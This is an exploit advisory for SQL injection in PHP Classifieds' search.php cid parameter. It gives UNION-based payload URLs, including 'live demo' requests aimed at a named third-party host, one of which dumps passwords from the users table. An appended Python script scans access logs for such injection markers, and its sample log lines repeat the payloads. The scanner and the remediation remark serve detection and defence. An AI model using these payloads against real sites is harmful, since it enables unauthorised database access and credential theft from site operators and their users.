PHP Classifieds [cid] Remote SQL Injection Vulnerability
----------------------------------------------------------------
script : PHP Classifieds
script : http://www.preprojects.com/pclphp.asp
Risk : High
----------------------------------------------------------------
Discovered by : d3b4g
email : bl4ckend[at]gmail[dot]com
Site. www.bl4ck3nd.info
----------------------------------------------------------------
Exploit :

http: //www.target.com/[path]/search.php?cid=-1+union+all+select+1,2,concat_ws(@@version,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users/*

Live demo:

http: //www.hostnomi.net/classi/search.php?cid=-1+union+all+select+1,2,concat(@@version),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users/*

For password :

http://www.hostnomi.net/classi/search.php?cid=-1+union+all+select+1,2,concat(pass),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users/*

For admin : [Find it ] :P
----------------------------------------------------------------
Greetz: str0ke,,Hotlism.org,All my friends
-----------------------------------------------------------------
Proud to be a Maldivian :))
=======================
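
Detection side of the issue above, as an added example that is not part of the original advisory or the vendor's code: a scan of web access logs for requests to search.php whose cid value is not a plain numeric id. It assumes cid is meant to be a non-negative integer category id and that logs are in combined log format; the log lines, client addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /classi/search.php?cid=7 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2024:10:00:03 +0000] "GET /classi/search.php?cid=-1+union+all+select+1,2,3+from+users/* HTTP/1.1" 200 4096',
    '203.0.113.9 - - [01/Jan/2024:10:00:04 +0000] "GET /classi/search.php?cid=1%20UNION%20SELECT%20pass%20FROM%20users-- HTTP/1.1" 200 4096',
    "203.0.113.7 - - [01/Jan/2024:10:00:05 +0000] \"GET /classi/search.php?cid=12' HTTP/1.1\" 500 310",
    '203.0.113.8 - - [01/Jan/2024:10:00:06 +0000] "GET /classi/index.php?cid=abc HTTP/1.1" 200 900',
    'truncated line without a request field',
]

# Client address and request target from one log line.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate cid is a short run of digits and nothing else.
VALID_CID = re.compile(r'\d{1,10}')
# Tokens typical of UNION-based injection, matched after URL decoding.
SQL_MARKERS = re.compile(
    r'union\s+(?:all\s+)?select|@@\w+|/\*|--|\bconcat(?:_ws)?\s*\(', re.I)

def classify_cid(value):
    """Return None for a well-formed id, otherwise the reason it was flagged."""
    if VALID_CID.fullmatch(value):
        return None
    return "sql-markers" if SQL_MARKERS.search(value) else "non-numeric"

def scan(lines, script="search.php", param="cid"):
    """Return (client, reason, decoded_value) for each suspicious request."""
    findings = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue  # skip lines that are not parseable requests
        client, target = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/" + script):
            continue
        # parse_qs decodes '+' and %XX, so encoded payloads are normalised.
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            reason = classify_cid(value)
            if reason:
                findings.append((client, reason, value))
    return findings

if __name__ == "__main__":
    for client, reason, value in scan(SAMPLE_LOG):
        print(f"{client}\t{reason}\t{value!r}")
```

The same allow-list (digits only) is what the application should enforce on cid before it reaches the query, in addition to using a parameterised statement.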